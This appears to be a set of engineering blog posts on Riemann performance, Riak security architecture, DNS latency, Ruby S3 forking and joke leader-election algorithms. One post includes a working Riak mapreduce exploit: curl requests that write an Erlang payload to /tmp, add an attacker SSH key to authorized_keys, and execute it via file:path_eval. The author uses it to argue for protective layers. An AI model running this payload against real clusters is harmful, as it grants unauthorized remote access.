I've been focusing on Riemann client libraries and optimizations recently, both at Boundary and on my own time.

Boundary uses the JVM extensively, and takes advantage of Coda Hale's Metrics. For our applications I've written a Riemann Java UDP and TCP client, which also includes a Metrics reporter. The Metrics reporter (I'll be submitting that to metrics-contrib later) will just send periodic events for each of the metrics in a registry, and optionally some VM statistics as well. It can prefix each service, filter with predicates, and has been reporting for two of our production systems for about a week now.
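To make the reporter's behavior concrete, here's a minimal Ruby sketch of the idea. It is not the Java client's API: `events_for`, the registry-as-Hash shape, and the event fields are all assumptions made for illustration.

```ruby
# Hypothetical sketch: turn a registry of metrics into Riemann-style events.
# `registry` is assumed to be a Hash of metric name => numeric value.
def events_for(registry, prefix: nil, host: "localhost", &predicate)
  registry.each_with_object([]) do |(name, value), events|
    # Skip metrics the caller's predicate rejects (no predicate keeps everything).
    next if predicate && !predicate.call(name, value)
    service = prefix ? "#{prefix} #{name}" : name.to_s
    events << { host: host, service: service, metric: value, time: Time.now.to_i }
  end
end

registry = { "requests.rate" => 42.0, "jvm.heap.used" => 0.63 }
# Prefix every service with "api" and drop the VM statistics.
events = events_for(registry, prefix: "api") { |name, _| !name.start_with?("jvm.") }
```

A real reporter would run something like this on a timer and hand the resulting events to the client for delivery.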

The Java client has been integrated into Riemann itself, replacing the old Aleph client. It's about on par with the old Aleph client, owing to its use of standard Socket and friends as opposed to Netty. Mårten Gustafson and Edward Ribeiro have been instrumental in getting the Java client up and running, so my sincere thanks go out to both of them.

I also removed the last traces of Aleph from riemann.server, replacing the TCP server with a pure Netty implementation. I also replaced Gloss with Netty-provided length header parsers, which cuts down on copying somewhat. Here's the performance of a single-threaded localhost client which sends an event and receives an OK response:

Aleph                            Raw Netty
drop tcp events latency.png      drop tcp events latency 2.png
drop tcp events throughput.png   drop tcp events throughput 2.png

Steady-state throughput with raw Netty is about 2.5 times higher. Median and 95% latency are significantly decreased, though occasional 20ms spikes are still present (I presume due to GC). Please keep in mind these graphs can only be compared with each other; they depend significantly on the hardware and JVM. This also does not represent concurrent performance; I'm trying to optimize the simplest system first before moving up. With that in mind, Riemann's real-world performance with these changes should be “much faster”.
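For readers unfamiliar with length-header framing, here's a small Ruby sketch of the idea. It assumes a 4-byte big-endian length prefix in front of each message; `frame` and `unframe` are illustrative names, not part of Riemann or Netty.

```ruby
# Sketch of length-prefixed framing, assuming a 4-byte big-endian length header.

# Prefix a binary payload with its length.
def frame(payload)
  bytes = payload.b
  [bytes.bytesize].pack("N") + bytes
end

# Pull every complete message out of a receive buffer.
# Returns [messages, remaining_bytes]; a partial message stays in the remainder.
def unframe(buffer)
  buffer = buffer.b
  messages = []
  offset = 0
  while buffer.bytesize - offset >= 4
    length = buffer.byteslice(offset, 4).unpack1("N")
    break if buffer.bytesize - offset - 4 < length # body not fully received yet
    messages << buffer.byteslice(offset + 4, length)
    offset += 4 + length
  end
  [messages, buffer.byteslice(offset, buffer.bytesize - offset)]
end

# Two whole messages followed by the first six bytes of a third.
stream = frame("event-1") + frame("ok") + frame("partial")[0, 6]
messages, rest = unframe(stream)
```

Because the header says exactly how many bytes follow, the parser can slice messages out of the buffer directly instead of scanning for delimiters.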

Next up I'll be replacing clojure-protobuf with direct use of the Java protobuf classes; as I'm copying data into a standard Map anyway it should be slightly faster and consolidate codepaths between server and client. I'll also begin type-hinting key sections of the server and message parser to reduce use of reflection.

The initial stable release of Riemann 0.1.0 is available for download. This is the culmination of the 0.0.3 development path and 2 months of production use at Showyou.

Is it production ready? I think so. The fundamental stream operators are in place. A comprehensive test suite checks out. Riemann has never crashed. Its performance characteristics should be suitable for a broad range of scales and applications.

There is a possible memory leak, on the order of 1% per day in our production setup. I can't replicate it under a variety of stress tests. It's not clear to me whether this is legitimate state information (i.e. an increase in tracked data), GC/malloc implementations being greedy, or an actual memory leak. Profiling and understanding this is my top priority for Riemann. If this happens to you, restarting the daemon every few weeks should not be prohibitive; it takes about five seconds to reload. Should you encounter this issue, please drop me a line with your configuration; it may help me identify the cause.

The Riemann talk tonight at Boundary is sold out, but I may deliver another in the next month or so. Thanks for your interest, suggestions, and patches. I hope you enjoy Riemann. :)

When I designed UState, I had a goal of a thousand state transitions per second. I hit about six hundred on my Macbook Pro, and skirted 1000/s on real hardware. Eventmachine is good, but I started to bump up against concurrency limits in MRI's interpreter lock, my ability to generate and exchange SQL with SQLite, and protobuf parse times. So I set out to write a faster server. I chose Clojure for its expressiveness and powerful model of concurrent state–and more importantly, the JVM, which gets me Netty, a mature virtual machine with a decent thread model, and a wealth of fast libraries for parsing, state, and statistics. That project is called Riemann.

Today, I'm pleased to announce that Riemann crossed the 10,000 event/second mark in production. In fact it's skirting 11k in my stress tests. (That final drop in throughput is an artifact of the graph system showing partially-complete data.)

throughput.png

cpu.png

By the way, we push about 200 events/sec through a single Riemann server from all of Showyou's infrastructure. There's a lot of headroom.

I did the dumbest, easiest things possible. No profiling. A heavy abstraction (aleph) on top of netty. I haven't even turned on warn-on-reflection or provided type hints yet. All operations are over synchronous TCP. This benchmark measures Riemann's ability to thread events through a complex set of streams including dozens of (where) filters and updating the index with every received event.

10k.png

I'm in the final stages of packaging Riemann for initial public release this week. Boundary has also kindly volunteered their space for a tech talk on Riemann: Thursday, March 1st, at Boundary's offices, likely at 7 PM. I'll post a Meetup link here and on Twitter shortly.

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 7, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \
  http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]
 ],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         // "/tmp/evil.erl"
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "write_file",
     "arg": "
       SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n
       SSH = SSHDir ++ \"authorized_keys\".\n
       filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n
       file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n
       file:change_mode(SSHDir, 8#700).\n
       file:change_mode(SSH, 8#600).\n
       file:delete(\"/tmp/evil.erl\").
     "
   }}
 ]
}
EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote Erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_keys.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "path_eval",
     "arg": "/tmp/evil.erl",
   }}
 ]
}

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.
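As one example of the rate/payload sanity checking such a layer might do, here's a hedged Ruby sketch. `RequestGate`, its limits, and its return symbols are all hypothetical; it uses a simple one-second fixed window per client, which is only one of several reasonable rate-limiting schemes.

```ruby
# Hypothetical sketch of per-client rate and payload checks in a protective layer.
class RequestGate
  def initialize(max_per_second:, max_bytes:, clock: -> { Time.now.to_i })
    @max_per_second = max_per_second
    @max_bytes = max_bytes
    @clock = clock # injectable so the limiter can be tested without sleeping
    @windows = Hash.new { |h, k| h[k] = [nil, 0] } # client => [second, count]
  end

  # Returns :ok, :too_large, or :rate_limited.
  def check(client, payload)
    return :too_large if payload.bytesize > @max_bytes
    now = @clock.call
    second, count = @windows[client]
    count = 0 unless second == now # a new one-second window has started
    return :rate_limited if count >= @max_per_second
    @windows[client] = [now, count + 1]
    :ok
  end
end

gate = RequestGate.new(max_per_second: 2, max_bytes: 1024)
gate.check("alice", "some request body")
```

The gate sits in front of the database and rejects requests before any work reaches the cluster; a production version would also need locking and eviction of idle clients.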

As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

mapred.png

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the allowed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. OAuth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.
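Here's a rough Ruby sketch of what "expensively hashed, salted passwords" can look like using only the standard library. PBKDF2 stands in for whatever slow hash you prefer, and the iteration count and helper names are assumptions, not recommendations.

```ruby
require "openssl"
require "securerandom"

ITERATIONS = 100_000 # assumed work factor; tune for your hardware

# Derive a salted, deliberately slow hash of the password.
def hash_password(password, salt = SecureRandom.random_bytes(16))
  digest = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERATIONS, 32,
                                      OpenSSL::Digest.new("SHA256"))
  { salt: salt, digest: digest }
end

# Compare two byte strings without stopping at the first differing byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Re-derive the hash with the stored salt and compare.
def valid_password?(password, record)
  candidate = hash_password(password, record[:salt])[:digest]
  secure_equal?(candidate, record[:digest])
end

record = hash_password("correct horse")
valid_password?("correct horse", record)
```

Only the salt and digest are stored; the per-user salt means identical passwords produce different digests, and the iteration count makes each guess expensive for an attacker.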

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.
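A default-deny policy can be sketched in a few lines of Ruby. The rules below encode the three example policies mentioned earlier; the `user` and `resource` hash shapes and the `allowed?` helper are hypothetical.

```ruby
# Hypothetical policy sketch: deny by default, allow only enumerated edges.
ALLOWED = [
  # Anybody can download public files.
  ->(user, action, resource) { action == :download && resource[:public] },
  # A given user can read their own messages.
  ->(user, action, resource) {
    action == :read && resource[:type] == :message && resource[:owner] == user[:name]
  },
  # Only sysadmins can access debugging information.
  ->(user, action, resource) {
    action == :read && resource[:type] == :debug && user[:role] == :sysadmin
  }
].freeze

# An action is permitted only if some rule explicitly allows it.
def allowed?(user, action, resource)
  ALLOWED.any? { |rule| rule.call(user, action, resource) }
end

alice = { name: "alice", role: :user }
allowed?(alice, :read, { type: :message, owner: "alice" })
```

Anything nobody thought to write a rule for, such as deleting a message, is denied automatically, which is the whole point of whitelisting.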

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed.
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.
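The later layers in the list above can be sketched as a chain of checks, each of which either rejects the request or passes it inward. Everything here (the request fields, the placeholder credential check, the `handle` function) is hypothetical and only illustrates the ordering.

```ruby
# Hypothetical sketch: each layer either rejects the request or passes it inward.
Rejected = Class.new(StandardError)

LAYERS = [
  ["validation",     ->(req) { req[:amount].is_a?(Integer) }],
  # Placeholder credential check; a real layer would verify a password hash or token.
  ["authentication", ->(req) { req[:user] == "alice" && req[:token] == "secret" }],
  ["authorization",  ->(req) { req[:account_owner] == req[:user] }],
  ["application",    ->(req) { req[:amount] > 0 }]
].freeze

# Run the request through every layer in order; stop at the first rejection.
def handle(req)
  LAYERS.each do |name, check|
    raise Rejected, "rejected by #{name} layer" unless check.call(req)
  end
  :operation_begins
end

handle({ user: "alice", token: "secret", account_owner: "alice", amount: 10 })
```

Order matters: the application layer can safely compare `amount` to zero only because the validation layer has already guaranteed it is an integer.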

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have fewer ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. Alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employees' salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usernames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Let's sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, MySQL, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.
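Step 7, the bucket validator, is the least obvious of these, so here's a hedged Ruby sketch. `BucketService` is a hypothetical in-memory stand-in for the real bucket service; the point is only that the check and the registration happen as a single atomic step.

```ruby
# Hypothetical in-memory stand-in for the bucket service described above.
class BucketService
  def initialize
    @owners = {} # bucket name => owning user
    @lock = Mutex.new
  end

  # Registers the bucket to `user` if it is unclaimed, then reports
  # whether `user` owns it. Check and registration share one lock.
  def claim_or_verify(bucket, user)
    @lock.synchronize do
      @owners[bucket] ||= user
      @owners[bucket] == user
    end
  end
end

buckets = BucketService.new
buckets.claim_or_verify("photos", "alice") # first write registers the bucket
buckets.claim_or_verify("photos", "bob")   # a different user is refused
```

If the check and the registration were separate calls, two users writing to a fresh bucket at the same moment could both believe they own it.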

Naturally, this only works for certain operations. Mapreduce, for instance, executes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.
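A validation layer that allows only puts and gets might look something like this Ruby sketch. The `/riak/<bucket>/<key>` path shape and the permitted character set are assumptions for illustration; a real validator would also inspect headers and body size.

```ruby
# Hypothetical allowlist for a Riak-facing proxy: only key reads and writes pass.
# The /riak/<bucket>/<key> path shape and character set are assumptions.
OBJECT_PATH = %r{\A/riak/([A-Za-z0-9_\-]+)/([A-Za-z0-9_\-]+)\z}
ALLOWED_METHODS = %w[GET PUT].freeze

# True only for a GET or PUT against a single bucket/key path.
def riak_request_allowed?(http_method, path)
  ALLOWED_METHODS.include?(http_method.to_s.upcase) && OBJECT_PATH.match?(path)
end

riak_request_allowed?("GET", "/riak/photos/cat")
riak_request_allowed?("POST", "/mapred")
```

Because the validator enumerates what is allowed rather than what is forbidden, mapreduce, key listing, and any endpoint added in a future Riak release are all rejected without further work.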

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

One of the hard-won lessons of the last few weeks has been that inexplicable periodic latency jumps in network services should be met with an investigation into named.

dns_latency.png

API latency has been wonky the last couple weeks; for a few hours it will rise to roughly 5 to 10x normal, then drop again. Nothing in syslog, no connection table issues, ip stats didn't reveal any TCP/IP layer difficulties, network was solid, no CPU, memory, or disk contention, no obviously correlated load on other hosts. Turns out it was Bind getting overwhelmed (we have, er, nontrivial DNS demands) and causing local domain resolution to slow down. For now I'm just pushing everything out in /etc/hosts, but will probably drop a local bind9 on every host as a cache.
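To show what a resolver cache buys you, here's a small in-process Ruby sketch. `CachingResolver` is hypothetical and far simpler than a local caching nameserver (it applies a fixed TTL rather than honoring the TTLs in DNS records, and isn't thread-safe), but the principle is the same.

```ruby
require "resolv"

# Hypothetical in-process cache; a local caching resolver does the same job host-wide.
class CachingResolver
  def initialize(ttl: 60,
                 resolver: ->(name) { Resolv.getaddress(name) },
                 clock: -> { Time.now.to_f })
    @ttl = ttl
    @resolver = resolver # injectable so the cache can be exercised without DNS
    @clock = clock
    @cache = {} # name => [address, expires_at]
  end

  def lookup(name)
    address, expires_at = @cache[name]
    return address if expires_at && @clock.call < expires_at # fast path
    address = @resolver.call(name) # slow path: ask the real resolver
    @cache[name] = [address, @clock.call + @ttl]
    address
  end
end

dns = CachingResolver.new(ttl: 30)
```

Repeated calls to `dns.lookup` for the same name within the TTL never touch the upstream resolver, so a slow or overloaded nameserver only hurts the first request.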

If anyone has experience with production DNS resolver caching, I'd appreciate your input.

John Muellerleile, Phil Kulak, and I gave a talk tonight, entitled "Scaling at Showyou."

stack.png

I gave an overview of the Showyou architecture, including our use of Riak, Solr, and Redis; strategies for robust systems; and our comprehensive monitoring system. You may want to check out:

Phil talked a little bit about the importer, including our use of Node.js and some nice stats.

John dropped lots of juicy details regarding his exciting projects, including a new Riak backend which binds together Solr, LevelDB, and a distributed processing system we're calling Fabric. Fast parallelized key listing, range queries, full-text search, geospatial queries, etc. In Riak. Yes, you heard that right.

Oh, and as a part of Fabric we've got a distributed queue with replicated failover and transactions, built on top of Hazelcast. Exposed over protocol buffers. We've got some polishing to do before that gets released, but when it does, should be worthy of another talk.

AWS::S3 is not threadsafe. Hell, it's not even reusable; most methods go through a class constant. To use it in threaded code, it's necessary to isolate S3 operations in memory. Fork to the rescue!

def s3(key, data, bucket, opts)
  begin
    fork_to do
      AWS::S3::Base.establish_connection!(
        :access_key_id => KEY,
        :secret_access_key => SECRET
      )
      AWS::S3::S3Object.store key, data, bucket, opts
    end
  rescue Timeout::Error
    raise SubprocessTimedOut
  end
end

def fork_to(timeout = 4)
  r, w, pid = nil, nil, nil
  begin
    # Open pipe
    r, w = IO.pipe
    # Start subprocess
    pid = fork do
      # Child
      begin
        r.close
        val = begin
          Timeout.timeout(timeout) do
            # Run block
            yield
          end
        rescue Exception => e
          e
        end
        w.write Marshal.dump val
        w.close
      ensure
        # YOU SHALL NOT PASS
        # Skip at_exit handlers.
        exit!
      end
    end
    # Parent
    w.close
    Timeout.timeout(timeout) do
      # Read value from pipe
      begin
        val = Marshal.load r.read
      rescue ArgumentError => e
        # Marshal data too short
        # Subprocess likely exited without writing.
        raise Timeout::Error
      end
      # Return or raise value from subprocess.
      case val
      when Exception
        raise val
      else
        return val
      end
    end
  ensure
    if pid
      Process.kill "TERM", pid rescue nil
      Process.kill "KILL", pid rescue nil
      Process.waitpid pid rescue nil
    end
    r.close rescue nil
    w.close rescue nil
  end
end

There's a lot of bookkeeping here. In a nutshell we're forking and running a given block in a forked subprocess. The result of that operation is returned to the parent by a pipe. The rest is just timeouts and process accounting. Subprocesses have a tendency to get tied up, leaving dangling pipes or zombies floating around. I know there are weak points and race conditions here, but with robust retry code this approach is suitable for production.

Using this approach, I can typically keep ~8 S3 uploads running concurrently (on a fairly busy 6-core HT Nehalem) and obtain ~sixfold throughput compared to locking S3 operations with a mutex.
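The "robust retry code" mentioned above isn't shown, so here's one hedged guess at its shape: a small helper that retries a block with exponential backoff. `with_retries`, its defaults, and this definition of `SubprocessTimedOut` are assumptions for the sake of a self-contained example.

```ruby
# Hypothetical retry helper. SubprocessTimedOut is defined here only so the
# sketch is self-contained; it mirrors the error raised by s3() above.
class SubprocessTimedOut < StandardError; end

# Runs the block, retrying on SubprocessTimedOut up to `attempts` times
# with exponentially growing pauses between tries.
def with_retries(attempts: 3, base_delay: 0.5, sleeper: ->(s) { sleep s })
  tries = 0
  begin
    tries += 1
    yield tries
  rescue SubprocessTimedOut
    raise if tries >= attempts # out of attempts: let the caller see the error
    sleeper.call(base_delay * 2**(tries - 1)) # exponential backoff
    retry
  end
end

# Usage, assuming the s3 method above is defined:
#   with_retries { s3(key, data, bucket, opts) }
```

Backing off between attempts gives a stuck subprocess or a struggling S3 endpoint a moment to recover instead of hammering it immediately.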

In distributed systems, one frequently needs a set of n nodes to come to a consensus on a particular coordinating or master node, referred to as the leader. Leader election protocols are used to establish this. Sure, you could do the Swedish or the Silverback, but there's a whole world of consensus algorithms out there. For instance:

The Agent Smith

Each node injects its neighbors with a total copy of its own state and identity, taking over operations on that node. Convergence is reached when all nodes are identical.

The Highlander Ending

This trivial algorithm simply ensures that all nodes crash upon receiving any decapitate message from a neighbor k. That node's responsibilities and powers are delegated to k. The last node standing wins.

The Deathly Hallows

Each node i contacts zero to n-1 other nodes, and stores upon each a prime number known as a hoarcrux. The product of all hoarcruxen is the Avada Kedavra for node i; when i receives it in a message, it immediately exits the leader election process. Each node proceeds to contact its neighbors in search of hoarcruxes, and attempts to use them to win the election. If a node is terminated while its killing curse is "in flight", the curse is negated and both nodes seek new targets.

The Terminator II

This leader election protocol can only be implemented on computational substrates embedded in closed timelike curves. This system has the happy property of never encountering a conflict. If two nodes ever conflict, each dispatches a function to before the origin of the system, killing its competitor before it enters the cluster. Logical coherency then requires the system proceeds without ever encountering a failure.

Note: attempts to implement this process have resulted in the untimely and grisly redacted redacted redacted of no fewer than -0 programmers, due to we regret to inform you that this message is inappropriate for younger viewers.

The Cthulhu Fhtagn

A small subset of nodes are classified as the Old Ones and enter sleep. All other nodes are considered cultists and send messages to a randomly selected Old One. When a sufficient (randomly determined) number of prayers have been received by an Old One (or whenever it feels like), it awakens and is considered the leader. All cultists immediately dump core.

Note: Astute readers may have noticed this protocol does not guarantee a leader exists, or for that matter, that there is at most one leader. Embrace chaos.

Note: CTHULHU FHTAGN CTHULHU FHTAGN CTHULHU FHTAGN CTHULHU FHTAGN CTHULHU FHTAGN

Note: A variant of this algorithm is used in several popular distributed databases.

The Folsom State Fair

Each node is designated, by PRNG, a "top" or "bottom" role, and begins in state virgin. Each bottom b advertises its availability to its neighbors; when it encounters a top t, b changes state to claimed and considers itself the property of t. When all bottoms have given up their virginity, the leader is the top with the most claimed nodes. Ties are resolved by selecting the remaining tops and recursively evaluating the protocol, only this time every node issues a log message that it's really just versatile.

The Congressional Election

Nodes assign themselves to one of two parties, A or B, by random value. A quorum agreement between nodes is required to elect a leader. Voting for a leader proceeds in synchronized rounds, typically lasting multiple days.

When a vote arises, each node issues a broadcast message informing the cluster of its vote. A nodes always vote for the A node with the highest process identifier. B nodes always vote for the B node with the highest process identifier.

If at any point more than 60% of the messages received by a given node are for the opposite party, that node initiates a filibuster. It spams the network with a hold message, during which no other nodes can proceed with the election process.

This protocol proceeds until the cluster has almost exhausted virtual memory, at which point a quarter of the processes (with the exception of the distributed system itself) on each host are terminated, and the election process restarts.

If you ever need to unzip data compressed with zlib without a header (e.g. produced by Erlang's zlib:zip), it pays to be aware that

windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. (zlib.h)

Hence, you can do something like

zs = Zlib::Inflate.new(-15)
unzipped = zs.inflate(string)
zs.finish
zs.close

